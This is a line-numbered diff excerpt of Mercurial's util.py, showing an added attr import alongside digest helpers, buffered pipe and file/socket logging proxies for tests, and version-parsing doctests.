24 24 import hashlib
25 25 import itertools
26 26 import mmap
27 27 import os
28 28 import platform as pyplatform
29 29 import re as remod
30 30 import shutil
31 31 import socket
32 32 import stat
33 33 import sys
34 34 import time
35 35 import traceback
36 36 import warnings
37 37 import zlib
38 38
39 from .thirdparty import (
40 attr,
41 )
39 42 from . import (
40 43 encoding,
41 44 error,
42 45 i18n,
43 46 node as nodemod,
44 47 policy,
45 48 pycompat,
46 49 urllibcompat,
47 50 )
48 51 from .utils import (
49 52 procutil,
50 53 stringutil,
51 54 )
52 55
53 56 base85 = policy.importmod(r'base85')
54 57 osutil = policy.importmod(r'osutil')
55 58 parsers = policy.importmod(r'parsers')
56 59
57 60 b85decode = base85.b85decode
58 61 b85encode = base85.b85encode
59 62
60 63 cookielib = pycompat.cookielib
61 64 httplib = pycompat.httplib
62 65 pickle = pycompat.pickle
63 66 safehasattr = pycompat.safehasattr
64 67 socketserver = pycompat.socketserver
65 68 bytesio = pycompat.bytesio
66 69 # TODO deprecate stringio name, as it is a lie on Python 3.
67 70 stringio = bytesio
68 71 xmlrpclib = pycompat.xmlrpclib
69 72
70 73 httpserver = urllibcompat.httpserver
71 74 urlerr = urllibcompat.urlerr
72 75 urlreq = urllibcompat.urlreq
73 76
74 77 # workaround for win32mbcs
75 78 _filenamebytestr = pycompat.bytestr
76 79
77 80 if pycompat.iswindows:
78 81 from . import windows as platform
79 82 else:
80 83 from . import posix as platform
81 84
82 85 _ = i18n._
83 86
84 87 bindunixsocket = platform.bindunixsocket
85 88 cachestat = platform.cachestat
86 89 checkexec = platform.checkexec
87 90 checklink = platform.checklink
88 91 copymode = platform.copymode
89 92 expandglobs = platform.expandglobs
90 93 getfsmountpoint = platform.getfsmountpoint
91 94 getfstype = platform.getfstype
92 95 groupmembers = platform.groupmembers
93 96 groupname = platform.groupname
94 97 isexec = platform.isexec
95 98 isowner = platform.isowner
96 99 listdir = osutil.listdir
97 100 localpath = platform.localpath
98 101 lookupreg = platform.lookupreg
99 102 makedir = platform.makedir
100 103 nlinks = platform.nlinks
101 104 normpath = platform.normpath
102 105 normcase = platform.normcase
103 106 normcasespec = platform.normcasespec
104 107 normcasefallback = platform.normcasefallback
105 108 openhardlinks = platform.openhardlinks
106 109 oslink = platform.oslink
107 110 parsepatchoutput = platform.parsepatchoutput
108 111 pconvert = platform.pconvert
109 112 poll = platform.poll
110 113 posixfile = platform.posixfile
111 114 rename = platform.rename
112 115 removedirs = platform.removedirs
113 116 samedevice = platform.samedevice
114 117 samefile = platform.samefile
115 118 samestat = platform.samestat
116 119 setflags = platform.setflags
117 120 split = platform.split
118 121 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
119 122 statisexec = platform.statisexec
120 123 statislink = platform.statislink
121 124 umask = platform.umask
122 125 unlink = platform.unlink
123 126 username = platform.username
124 127
125 128 try:
126 129 recvfds = osutil.recvfds
127 130 except AttributeError:
128 131 pass
129 132
130 133 # Python compatibility
131 134
132 135 _notset = object()
133 136
134 137 def bitsfrom(container):
135 138 bits = 0
136 139 for bit in container:
137 140 bits |= bit
138 141 return bits
139 142
140 143 # python 2.6 still have deprecation warning enabled by default. We do not want
141 144 # to display anything to standard user so detect if we are running test and
142 145 # only use python deprecation warning in this case.
143 146 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
144 147 if _dowarn:
145 148 # explicitly unfilter our warning for python 2.7
146 149 #
147 150 # The option of setting PYTHONWARNINGS in the test runner was investigated.
148 151 # However, module name set through PYTHONWARNINGS was exactly matched, so
149 152 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
150 153 # makes the whole PYTHONWARNINGS thing useless for our usecase.
151 154 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
152 155 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
153 156 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
154 157 if _dowarn and pycompat.ispy3:
155 158 # silence warning emitted by passing user string to re.sub()
156 159 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
157 160 r'mercurial')
158 161 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
159 162 DeprecationWarning, r'mercurial')
160 163 # TODO: reinvent imp.is_frozen()
161 164 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
162 165 DeprecationWarning, r'mercurial')
163 166
164 167 def nouideprecwarn(msg, version, stacklevel=1):
165 168 """Issue an python native deprecation warning
166 169
167 170 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
168 171 """
169 172 if _dowarn:
170 173 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
171 174 " update your code.)") % version
172 175 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
173 176
174 177 DIGESTS = {
175 178 'md5': hashlib.md5,
176 179 'sha1': hashlib.sha1,
177 180 'sha512': hashlib.sha512,
178 181 }
179 182 # List of digest types from strongest to weakest
180 183 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
181 184
182 185 for k in DIGESTS_BY_STRENGTH:
183 186 assert k in DIGESTS
184 187
185 188 class digester(object):
186 189 """helper to compute digests.
187 190
188 191 This helper can be used to compute one or more digests given their name.
189 192
190 193 >>> d = digester([b'md5', b'sha1'])
191 194 >>> d.update(b'foo')
192 195 >>> [k for k in sorted(d)]
193 196 ['md5', 'sha1']
194 197 >>> d[b'md5']
195 198 'acbd18db4cc2f85cedef654fccc4a4d8'
196 199 >>> d[b'sha1']
197 200 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
198 201 >>> digester.preferred([b'md5', b'sha1'])
199 202 'sha1'
200 203 """
201 204
202 205 def __init__(self, digests, s=''):
203 206 self._hashes = {}
204 207 for k in digests:
205 208 if k not in DIGESTS:
206 209 raise error.Abort(_('unknown digest type: %s') % k)
207 210 self._hashes[k] = DIGESTS[k]()
208 211 if s:
209 212 self.update(s)
210 213
211 214 def update(self, data):
212 215 for h in self._hashes.values():
213 216 h.update(data)
214 217
215 218 def __getitem__(self, key):
216 219 if key not in DIGESTS:
217 220 raise error.Abort(_('unknown digest type: %s') % k)
218 221 return nodemod.hex(self._hashes[key].digest())
219 222
220 223 def __iter__(self):
221 224 return iter(self._hashes)
222 225
223 226 @staticmethod
224 227 def preferred(supported):
225 228 """returns the strongest digest type in both supported and DIGESTS."""
226 229
227 230 for k in DIGESTS_BY_STRENGTH:
228 231 if k in supported:
229 232 return k
230 233 return None
231 234
232 235 class digestchecker(object):
233 236 """file handle wrapper that additionally checks content against a given
234 237 size and digests.
235 238
236 239 d = digestchecker(fh, size, {'md5': '...'})
237 240
238 241 When multiple digests are given, all of them are validated.
239 242 """
240 243
241 244 def __init__(self, fh, size, digests):
242 245 self._fh = fh
243 246 self._size = size
244 247 self._got = 0
245 248 self._digests = dict(digests)
246 249 self._digester = digester(self._digests.keys())
247 250
248 251 def read(self, length=-1):
249 252 content = self._fh.read(length)
250 253 self._digester.update(content)
251 254 self._got += len(content)
252 255 return content
253 256
254 257 def validate(self):
255 258 if self._size != self._got:
256 259 raise error.Abort(_('size mismatch: expected %d, got %d') %
257 260 (self._size, self._got))
258 261 for k, v in self._digests.items():
259 262 if v != self._digester[k]:
260 263 # i18n: first parameter is a digest name
261 264 raise error.Abort(_('%s mismatch: expected %s, got %s') %
262 265 (k, v, self._digester[k]))
263 266
264 267 try:
265 268 buffer = buffer
266 269 except NameError:
267 270 def buffer(sliceable, offset=0, length=None):
268 271 if length is not None:
269 272 return memoryview(sliceable)[offset:offset + length]
270 273 return memoryview(sliceable)[offset:]
271 274
272 275 _chunksize = 4096
273 276
274 277 class bufferedinputpipe(object):
275 278 """a manually buffered input pipe
276 279
277 280 Python will not let us use buffered IO and lazy reading with 'polling' at
278 281 the same time. We cannot probe the buffer state and select will not detect
279 282 that data are ready to read if they are already buffered.
280 283
281 284 This class let us work around that by implementing its own buffering
282 285 (allowing efficient readline) while offering a way to know if the buffer is
283 286 empty from the output (allowing collaboration of the buffer with polling).
284 287
285 288 This class lives in the 'util' module because it makes use of the 'os'
286 289 module from the python stdlib.
287 290 """
288 291 def __new__(cls, fh):
289 292 # If we receive a fileobjectproxy, we need to use a variation of this
290 293 # class that notifies observers about activity.
291 294 if isinstance(fh, fileobjectproxy):
292 295 cls = observedbufferedinputpipe
293 296
294 297 return super(bufferedinputpipe, cls).__new__(cls)
295 298
296 299 def __init__(self, input):
297 300 self._input = input
298 301 self._buffer = []
299 302 self._eof = False
300 303 self._lenbuf = 0
301 304
302 305 @property
303 306 def hasbuffer(self):
304 307 """True is any data is currently buffered
305 308
306 309 This will be used externally a pre-step for polling IO. If there is
307 310 already data then no polling should be set in place."""
308 311 return bool(self._buffer)
309 312
310 313 @property
311 314 def closed(self):
312 315 return self._input.closed
313 316
314 317 def fileno(self):
315 318 return self._input.fileno()
316 319
317 320 def close(self):
318 321 return self._input.close()
319 322
320 323 def read(self, size):
321 324 while (not self._eof) and (self._lenbuf < size):
322 325 self._fillbuffer()
323 326 return self._frombuffer(size)
324 327
325 328 def unbufferedread(self, size):
326 329 if not self._eof and self._lenbuf == 0:
327 330 self._fillbuffer(max(size, _chunksize))
328 331 return self._frombuffer(min(self._lenbuf, size))
329 332
330 333 def readline(self, *args, **kwargs):
331 334 if 1 < len(self._buffer):
332 335 # this should not happen because both read and readline end with a
333 336 # _frombuffer call that collapse it.
334 337 self._buffer = [''.join(self._buffer)]
335 338 self._lenbuf = len(self._buffer[0])
336 339 lfi = -1
337 340 if self._buffer:
338 341 lfi = self._buffer[-1].find('\n')
339 342 while (not self._eof) and lfi < 0:
340 343 self._fillbuffer()
341 344 if self._buffer:
342 345 lfi = self._buffer[-1].find('\n')
343 346 size = lfi + 1
344 347 if lfi < 0: # end of file
345 348 size = self._lenbuf
346 349 elif 1 < len(self._buffer):
347 350 # we need to take previous chunks into account
348 351 size += self._lenbuf - len(self._buffer[-1])
349 352 return self._frombuffer(size)
350 353
351 354 def _frombuffer(self, size):
352 355 """return at most 'size' data from the buffer
353 356
354 357 The data are removed from the buffer."""
355 358 if size == 0 or not self._buffer:
356 359 return ''
357 360 buf = self._buffer[0]
358 361 if 1 < len(self._buffer):
359 362 buf = ''.join(self._buffer)
360 363
361 364 data = buf[:size]
362 365 buf = buf[len(data):]
363 366 if buf:
364 367 self._buffer = [buf]
365 368 self._lenbuf = len(buf)
366 369 else:
367 370 self._buffer = []
368 371 self._lenbuf = 0
369 372 return data
370 373
371 374 def _fillbuffer(self, size=_chunksize):
372 375 """read data to the buffer"""
373 376 data = os.read(self._input.fileno(), size)
374 377 if not data:
375 378 self._eof = True
376 379 else:
377 380 self._lenbuf += len(data)
378 381 self._buffer.append(data)
379 382
380 383 return data
381 384
382 385 def mmapread(fp):
383 386 try:
384 387 fd = getattr(fp, 'fileno', lambda: fp)()
385 388 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
386 389 except ValueError:
387 390 # Empty files cannot be mmapped, but mmapread should still work. Check
388 391 # if the file is empty, and if so, return an empty buffer.
389 392 if os.fstat(fd).st_size == 0:
390 393 return ''
391 394 raise
392 395
393 396 class fileobjectproxy(object):
394 397 """A proxy around file objects that tells a watcher when events occur.
395 398
396 399 This type is intended to only be used for testing purposes. Think hard
397 400 before using it in important code.
398 401 """
399 402 __slots__ = (
400 403 r'_orig',
401 404 r'_observer',
402 405 )
403 406
404 407 def __init__(self, fh, observer):
405 408 object.__setattr__(self, r'_orig', fh)
406 409 object.__setattr__(self, r'_observer', observer)
407 410
408 411 def __getattribute__(self, name):
409 412 ours = {
410 413 r'_observer',
411 414
412 415 # IOBase
413 416 r'close',
414 417 # closed if a property
415 418 r'fileno',
416 419 r'flush',
417 420 r'isatty',
418 421 r'readable',
419 422 r'readline',
420 423 r'readlines',
421 424 r'seek',
422 425 r'seekable',
423 426 r'tell',
424 427 r'truncate',
425 428 r'writable',
426 429 r'writelines',
427 430 # RawIOBase
428 431 r'read',
429 432 r'readall',
430 433 r'readinto',
431 434 r'write',
432 435 # BufferedIOBase
433 436 # raw is a property
434 437 r'detach',
435 438 # read defined above
436 439 r'read1',
437 440 # readinto defined above
438 441 # write defined above
439 442 }
440 443
441 444 # We only observe some methods.
442 445 if name in ours:
443 446 return object.__getattribute__(self, name)
444 447
445 448 return getattr(object.__getattribute__(self, r'_orig'), name)
446 449
447 450 def __nonzero__(self):
448 451 return bool(object.__getattribute__(self, r'_orig'))
449 452
450 453 __bool__ = __nonzero__
451 454
452 455 def __delattr__(self, name):
453 456 return delattr(object.__getattribute__(self, r'_orig'), name)
454 457
455 458 def __setattr__(self, name, value):
456 459 return setattr(object.__getattribute__(self, r'_orig'), name, value)
457 460
458 461 def __iter__(self):
459 462 return object.__getattribute__(self, r'_orig').__iter__()
460 463
461 464 def _observedcall(self, name, *args, **kwargs):
462 465 # Call the original object.
463 466 orig = object.__getattribute__(self, r'_orig')
464 467 res = getattr(orig, name)(*args, **kwargs)
465 468
466 469 # Call a method on the observer of the same name with arguments
467 470 # so it can react, log, etc.
468 471 observer = object.__getattribute__(self, r'_observer')
469 472 fn = getattr(observer, name, None)
470 473 if fn:
471 474 fn(res, *args, **kwargs)
472 475
473 476 return res
474 477
475 478 def close(self, *args, **kwargs):
476 479 return object.__getattribute__(self, r'_observedcall')(
477 480 r'close', *args, **kwargs)
478 481
479 482 def fileno(self, *args, **kwargs):
480 483 return object.__getattribute__(self, r'_observedcall')(
481 484 r'fileno', *args, **kwargs)
482 485
483 486 def flush(self, *args, **kwargs):
484 487 return object.__getattribute__(self, r'_observedcall')(
485 488 r'flush', *args, **kwargs)
486 489
487 490 def isatty(self, *args, **kwargs):
488 491 return object.__getattribute__(self, r'_observedcall')(
489 492 r'isatty', *args, **kwargs)
490 493
491 494 def readable(self, *args, **kwargs):
492 495 return object.__getattribute__(self, r'_observedcall')(
493 496 r'readable', *args, **kwargs)
494 497
495 498 def readline(self, *args, **kwargs):
496 499 return object.__getattribute__(self, r'_observedcall')(
497 500 r'readline', *args, **kwargs)
498 501
499 502 def readlines(self, *args, **kwargs):
500 503 return object.__getattribute__(self, r'_observedcall')(
501 504 r'readlines', *args, **kwargs)
502 505
503 506 def seek(self, *args, **kwargs):
504 507 return object.__getattribute__(self, r'_observedcall')(
505 508 r'seek', *args, **kwargs)
506 509
507 510 def seekable(self, *args, **kwargs):
508 511 return object.__getattribute__(self, r'_observedcall')(
509 512 r'seekable', *args, **kwargs)
510 513
511 514 def tell(self, *args, **kwargs):
512 515 return object.__getattribute__(self, r'_observedcall')(
513 516 r'tell', *args, **kwargs)
514 517
515 518 def truncate(self, *args, **kwargs):
516 519 return object.__getattribute__(self, r'_observedcall')(
517 520 r'truncate', *args, **kwargs)
518 521
519 522 def writable(self, *args, **kwargs):
520 523 return object.__getattribute__(self, r'_observedcall')(
521 524 r'writable', *args, **kwargs)
522 525
523 526 def writelines(self, *args, **kwargs):
524 527 return object.__getattribute__(self, r'_observedcall')(
525 528 r'writelines', *args, **kwargs)
526 529
527 530 def read(self, *args, **kwargs):
528 531 return object.__getattribute__(self, r'_observedcall')(
529 532 r'read', *args, **kwargs)
530 533
531 534 def readall(self, *args, **kwargs):
532 535 return object.__getattribute__(self, r'_observedcall')(
533 536 r'readall', *args, **kwargs)
534 537
535 538 def readinto(self, *args, **kwargs):
536 539 return object.__getattribute__(self, r'_observedcall')(
537 540 r'readinto', *args, **kwargs)
538 541
539 542 def write(self, *args, **kwargs):
540 543 return object.__getattribute__(self, r'_observedcall')(
541 544 r'write', *args, **kwargs)
542 545
543 546 def detach(self, *args, **kwargs):
544 547 return object.__getattribute__(self, r'_observedcall')(
545 548 r'detach', *args, **kwargs)
546 549
547 550 def read1(self, *args, **kwargs):
548 551 return object.__getattribute__(self, r'_observedcall')(
549 552 r'read1', *args, **kwargs)
550 553
551 554 class observedbufferedinputpipe(bufferedinputpipe):
552 555 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
553 556
554 557 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
555 558 bypass ``fileobjectproxy``. Because of this, we need to make
556 559 ``bufferedinputpipe`` aware of these operations.
557 560
558 561 This variation of ``bufferedinputpipe`` can notify observers about
559 562 ``os.read()`` events. It also re-publishes other events, such as
560 563 ``read()`` and ``readline()``.
561 564 """
562 565 def _fillbuffer(self):
563 566 res = super(observedbufferedinputpipe, self)._fillbuffer()
564 567
565 568 fn = getattr(self._input._observer, r'osread', None)
566 569 if fn:
567 570 fn(res, _chunksize)
568 571
569 572 return res
570 573
571 574 # We use different observer methods because the operation isn't
572 575 # performed on the actual file object but on us.
573 576 def read(self, size):
574 577 res = super(observedbufferedinputpipe, self).read(size)
575 578
576 579 fn = getattr(self._input._observer, r'bufferedread', None)
577 580 if fn:
578 581 fn(res, size)
579 582
580 583 return res
581 584
582 585 def readline(self, *args, **kwargs):
583 586 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
584 587
585 588 fn = getattr(self._input._observer, r'bufferedreadline', None)
586 589 if fn:
587 590 fn(res)
588 591
589 592 return res
590 593
591 594 PROXIED_SOCKET_METHODS = {
592 595 r'makefile',
593 596 r'recv',
594 597 r'recvfrom',
595 598 r'recvfrom_into',
596 599 r'recv_into',
597 600 r'send',
598 601 r'sendall',
599 602 r'sendto',
600 603 r'setblocking',
601 604 r'settimeout',
602 605 r'gettimeout',
603 606 r'setsockopt',
604 607 }
605 608
606 609 class socketproxy(object):
607 610 """A proxy around a socket that tells a watcher when events occur.
608 611
609 612 This is like ``fileobjectproxy`` except for sockets.
610 613
611 614 This type is intended to only be used for testing purposes. Think hard
612 615 before using it in important code.
613 616 """
614 617 __slots__ = (
615 618 r'_orig',
616 619 r'_observer',
617 620 )
618 621
619 622 def __init__(self, sock, observer):
620 623 object.__setattr__(self, r'_orig', sock)
621 624 object.__setattr__(self, r'_observer', observer)
622 625
623 626 def __getattribute__(self, name):
624 627 if name in PROXIED_SOCKET_METHODS:
625 628 return object.__getattribute__(self, name)
626 629
627 630 return getattr(object.__getattribute__(self, r'_orig'), name)
628 631
629 632 def __delattr__(self, name):
630 633 return delattr(object.__getattribute__(self, r'_orig'), name)
631 634
632 635 def __setattr__(self, name, value):
633 636 return setattr(object.__getattribute__(self, r'_orig'), name, value)
634 637
635 638 def __nonzero__(self):
636 639 return bool(object.__getattribute__(self, r'_orig'))
637 640
638 641 __bool__ = __nonzero__
639 642
640 643 def _observedcall(self, name, *args, **kwargs):
641 644 # Call the original object.
642 645 orig = object.__getattribute__(self, r'_orig')
643 646 res = getattr(orig, name)(*args, **kwargs)
644 647
645 648 # Call a method on the observer of the same name with arguments
646 649 # so it can react, log, etc.
647 650 observer = object.__getattribute__(self, r'_observer')
648 651 fn = getattr(observer, name, None)
649 652 if fn:
650 653 fn(res, *args, **kwargs)
651 654
652 655 return res
653 656
654 657 def makefile(self, *args, **kwargs):
655 658 res = object.__getattribute__(self, r'_observedcall')(
656 659 r'makefile', *args, **kwargs)
657 660
658 661 # The file object may be used for I/O. So we turn it into a
659 662 # proxy using our observer.
660 663 observer = object.__getattribute__(self, r'_observer')
661 664 return makeloggingfileobject(observer.fh, res, observer.name,
662 665 reads=observer.reads,
663 666 writes=observer.writes,
664 667 logdata=observer.logdata,
665 668 logdataapis=observer.logdataapis)
666 669
667 670 def recv(self, *args, **kwargs):
668 671 return object.__getattribute__(self, r'_observedcall')(
669 672 r'recv', *args, **kwargs)
670 673
671 674 def recvfrom(self, *args, **kwargs):
672 675 return object.__getattribute__(self, r'_observedcall')(
673 676 r'recvfrom', *args, **kwargs)
674 677
675 678 def recvfrom_into(self, *args, **kwargs):
676 679 return object.__getattribute__(self, r'_observedcall')(
677 680 r'recvfrom_into', *args, **kwargs)
678 681
679 682 def recv_into(self, *args, **kwargs):
680 683 return object.__getattribute__(self, r'_observedcall')(
681 684 r'recv_info', *args, **kwargs)
682 685
683 686 def send(self, *args, **kwargs):
684 687 return object.__getattribute__(self, r'_observedcall')(
685 688 r'send', *args, **kwargs)
686 689
687 690 def sendall(self, *args, **kwargs):
688 691 return object.__getattribute__(self, r'_observedcall')(
689 692 r'sendall', *args, **kwargs)
690 693
691 694 def sendto(self, *args, **kwargs):
692 695 return object.__getattribute__(self, r'_observedcall')(
693 696 r'sendto', *args, **kwargs)
694 697
695 698 def setblocking(self, *args, **kwargs):
696 699 return object.__getattribute__(self, r'_observedcall')(
697 700 r'setblocking', *args, **kwargs)
698 701
699 702 def settimeout(self, *args, **kwargs):
700 703 return object.__getattribute__(self, r'_observedcall')(
701 704 r'settimeout', *args, **kwargs)
702 705
703 706 def gettimeout(self, *args, **kwargs):
704 707 return object.__getattribute__(self, r'_observedcall')(
705 708 r'gettimeout', *args, **kwargs)
706 709
707 710 def setsockopt(self, *args, **kwargs):
708 711 return object.__getattribute__(self, r'_observedcall')(
709 712 r'setsockopt', *args, **kwargs)
710 713
711 714 class baseproxyobserver(object):
712 715 def _writedata(self, data):
713 716 if not self.logdata:
714 717 if self.logdataapis:
715 718 self.fh.write('\n')
716 719 self.fh.flush()
717 720 return
718 721
719 722 # Simple case writes all data on a single line.
720 723 if b'\n' not in data:
721 724 if self.logdataapis:
722 725 self.fh.write(': %s\n' % stringutil.escapestr(data))
723 726 else:
724 727 self.fh.write('%s> %s\n'
725 728 % (self.name, stringutil.escapestr(data)))
726 729 self.fh.flush()
727 730 return
728 731
729 732 # Data with newlines is written to multiple lines.
730 733 if self.logdataapis:
731 734 self.fh.write(':\n')
732 735
733 736 lines = data.splitlines(True)
734 737 for line in lines:
735 738 self.fh.write('%s> %s\n'
736 739 % (self.name, stringutil.escapestr(line)))
737 740 self.fh.flush()
738 741
739 742 class fileobjectobserver(baseproxyobserver):
740 743 """Logs file object activity."""
741 744 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
742 745 logdataapis=True):
743 746 self.fh = fh
744 747 self.name = name
745 748 self.logdata = logdata
746 749 self.logdataapis = logdataapis
747 750 self.reads = reads
748 751 self.writes = writes
749 752
750 753 def read(self, res, size=-1):
751 754 if not self.reads:
752 755 return
753 756 # Python 3 can return None from reads at EOF instead of empty strings.
754 757 if res is None:
755 758 res = ''
756 759
757 760 if size == -1 and res == '':
758 761 # Suppress pointless read(-1) calls that return
759 762 # nothing. These happen _a lot_ on Python 3, and there
760 763 # doesn't seem to be a better workaround to have matching
761 764 # Python 2 and 3 behavior. :(
762 765 return
763 766
764 767 if self.logdataapis:
765 768 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
766 769
767 770 self._writedata(res)
768 771
769 772 def readline(self, res, limit=-1):
770 773 if not self.reads:
771 774 return
772 775
773 776 if self.logdataapis:
774 777 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
775 778
776 779 self._writedata(res)
777 780
778 781 def readinto(self, res, dest):
779 782 if not self.reads:
780 783 return
781 784
782 785 if self.logdataapis:
783 786 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
784 787 res))
785 788
786 789 data = dest[0:res] if res is not None else b''
787 790 self._writedata(data)
788 791
789 792 def write(self, res, data):
790 793 if not self.writes:
791 794 return
792 795
793 796 # Python 2 returns None from some write() calls. Python 3 (reasonably)
794 797 # returns the integer bytes written.
795 798 if res is None and data:
796 799 res = len(data)
797 800
798 801 if self.logdataapis:
799 802 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
800 803
801 804 self._writedata(data)
802 805
803 806 def flush(self, res):
804 807 if not self.writes:
805 808 return
806 809
807 810 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
808 811
809 812 # For observedbufferedinputpipe.
810 813 def bufferedread(self, res, size):
811 814 if not self.reads:
812 815 return
813 816
814 817 if self.logdataapis:
815 818 self.fh.write('%s> bufferedread(%d) -> %d' % (
816 819 self.name, size, len(res)))
817 820
818 821 self._writedata(res)
819 822
820 823 def bufferedreadline(self, res):
821 824 if not self.reads:
822 825 return
823 826
824 827 if self.logdataapis:
825 828 self.fh.write('%s> bufferedreadline() -> %d' % (
826 829 self.name, len(res)))
827 830
828 831 self._writedata(res)
829 832
830 833 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
831 834 logdata=False, logdataapis=True):
832 835 """Turn a file object into a logging file object."""
833 836
834 837 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
835 838 logdata=logdata, logdataapis=logdataapis)
836 839 return fileobjectproxy(fh, observer)
837 840
838 841 class socketobserver(baseproxyobserver):
839 842 """Logs socket activity."""
840 843 def __init__(self, fh, name, reads=True, writes=True, states=True,
841 844 logdata=False, logdataapis=True):
842 845 self.fh = fh
843 846 self.name = name
844 847 self.reads = reads
845 848 self.writes = writes
846 849 self.states = states
847 850 self.logdata = logdata
848 851 self.logdataapis = logdataapis
849 852
850 853 def makefile(self, res, mode=None, bufsize=None):
851 854 if not self.states:
852 855 return
853 856
854 857 self.fh.write('%s> makefile(%r, %r)\n' % (
855 858 self.name, mode, bufsize))
856 859
857 860 def recv(self, res, size, flags=0):
858 861 if not self.reads:
859 862 return
860 863
861 864 if self.logdataapis:
862 865 self.fh.write('%s> recv(%d, %d) -> %d' % (
863 866 self.name, size, flags, len(res)))
864 867 self._writedata(res)
865 868
866 869 def recvfrom(self, res, size, flags=0):
867 870 if not self.reads:
868 871 return
869 872
870 873 if self.logdataapis:
871 874 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
872 875 self.name, size, flags, len(res[0])))
873 876
874 877 self._writedata(res[0])
875 878
876 879 def recvfrom_into(self, res, buf, size, flags=0):
877 880 if not self.reads:
878 881 return
879 882
880 883 if self.logdataapis:
881 884 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
882 885 self.name, size, flags, res[0]))
883 886
884 887 self._writedata(buf[0:res[0]])
885 888
886 889 def recv_into(self, res, buf, size=0, flags=0):
887 890 if not self.reads:
888 891 return
889 892
890 893 if self.logdataapis:
891 894 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
892 895 self.name, size, flags, res))
893 896
894 897 self._writedata(buf[0:res])
895 898
896 899 def send(self, res, data, flags=0):
897 900 if not self.writes:
898 901 return
899 902
900 903 self.fh.write('%s> send(%d, %d) -> %d' % (
901 904 self.name, len(data), flags, len(res)))
902 905 self._writedata(data)
903 906
904 907 def sendall(self, res, data, flags=0):
905 908 if not self.writes:
906 909 return
907 910
908 911 if self.logdataapis:
909 912 # Returns None on success. So don't bother reporting return value.
910 913 self.fh.write('%s> sendall(%d, %d)' % (
911 914 self.name, len(data), flags))
912 915
913 916 self._writedata(data)
914 917
915 918 def sendto(self, res, data, flagsoraddress, address=None):
916 919 if not self.writes:
917 920 return
918 921
919 922 if address:
920 923 flags = flagsoraddress
921 924 else:
922 925 flags = 0
923 926
924 927 if self.logdataapis:
925 928 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
926 929 self.name, len(data), flags, address, res))
927 930
928 931 self._writedata(data)
929 932
930 933 def setblocking(self, res, flag):
931 934 if not self.states:
932 935 return
933 936
934 937 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
935 938
936 939 def settimeout(self, res, value):
937 940 if not self.states:
938 941 return
939 942
940 943 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
941 944
942 945 def gettimeout(self, res):
943 946 if not self.states:
944 947 return
945 948
946 949 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
947 950
948 951 def setsockopt(self, level, optname, value):
949 952 if not self.states:
950 953 return
951 954
952 955 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
953 956 self.name, level, optname, value))
954 957
955 958 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
956 959 logdata=False, logdataapis=True):
957 960 """Turn a socket into a logging socket."""
958 961
959 962 observer = socketobserver(logh, name, reads=reads, writes=writes,
960 963 states=states, logdata=logdata,
961 964 logdataapis=logdataapis)
962 965 return socketproxy(fh, observer)
963 966
964 967 def version():
965 968 """Return version information if available."""
966 969 try:
967 970 from . import __version__
968 971 return __version__.version
969 972 except ImportError:
970 973 return 'unknown'
971 974
972 975 def versiontuple(v=None, n=4):
973 976 """Parses a Mercurial version string into an N-tuple.
974 977
975 978 The version string to be parsed is specified with the ``v`` argument.
976 979 If it isn't defined, the current Mercurial version string will be parsed.
977 980
978 981 ``n`` can be 2, 3, or 4. Here is how some version strings map to
979 982 returned values:
980 983
981 984 >>> v = b'3.6.1+190-df9b73d2d444'
982 985 >>> versiontuple(v, 2)
983 986 (3, 6)
984 987 >>> versiontuple(v, 3)
985 988 (3, 6, 1)
986 989 >>> versiontuple(v, 4)
987 990 (3, 6, 1, '190-df9b73d2d444')
988 991
989 992 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
990 993 (3, 6, 1, '190-df9b73d2d444+20151118')
991 994
992 995 >>> v = b'3.6'
993 996 >>> versiontuple(v, 2)
994 997 (3, 6)
995 998 >>> versiontuple(v, 3)
996 999 (3, 6, None)
997 1000 >>> versiontuple(v, 4)
998 1001 (3, 6, None, None)
999 1002
1000 1003 >>> v = b'3.9-rc'
1001 1004 >>> versiontuple(v, 2)
1002 1005 (3, 9)
1003 1006 >>> versiontuple(v, 3)
1004 1007 (3, 9, None)
1005 1008 >>> versiontuple(v, 4)
1006 1009 (3, 9, None, 'rc')
1007 1010
1008 1011 >>> v = b'3.9-rc+2-02a8fea4289b'
1009 1012 >>> versiontuple(v, 2)
1010 1013 (3, 9)
1011 1014 >>> versiontuple(v, 3)
1012 1015 (3, 9, None)
1013 1016 >>> versiontuple(v, 4)
1014 1017 (3, 9, None, 'rc+2-02a8fea4289b')
1015 1018
1016 1019 >>> versiontuple(b'4.6rc0')
1017 1020 (4, 6, None, 'rc0')
1018 1021 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
